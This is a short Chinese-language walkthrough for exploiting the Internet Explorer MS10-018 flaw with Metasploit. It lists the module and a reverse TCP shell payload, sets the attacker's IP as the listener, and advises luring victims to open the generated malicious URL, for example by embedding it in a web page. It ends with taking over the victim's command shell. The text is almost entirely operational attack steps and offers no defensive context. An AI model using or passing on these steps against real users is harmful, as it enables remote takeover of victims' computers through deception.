1、打开metasploit工具,等待工具启动。键入search ms10-018
2、use exploit/windows/browser/ms10_018_ie_behaviors
应用模块
3、安装一个反向链接工具
set payload windows/shell/reverse_tcp
4、设置服务器地址 为攻击者自身ip,运行show options 显示选项
set srvhost 攻击者ip 设置服务提供者ip
set lhost 攻击者ip
show options查看选项
5、显示可以被利用的操作系统
6、执行恶意代码,会生成一个一个URL,想方设法让被攻击者打开。比方说内嵌在网页中,在这里我们就直接在IE内打开这个URL
7、当攻击者打开该URL时,IE卡死,崩溃
8、此时,界面会显示中招的主机
9、执行show sissons 查看会话
10、执行sessions -i 会话号 成功获取到被攻击者cmd
11、此时被攻击者,IE卡死,崩溃,攻击者拿到了被攻击者的权限,为所欲为。
此时就像在xp上一样打开cmd执行命令
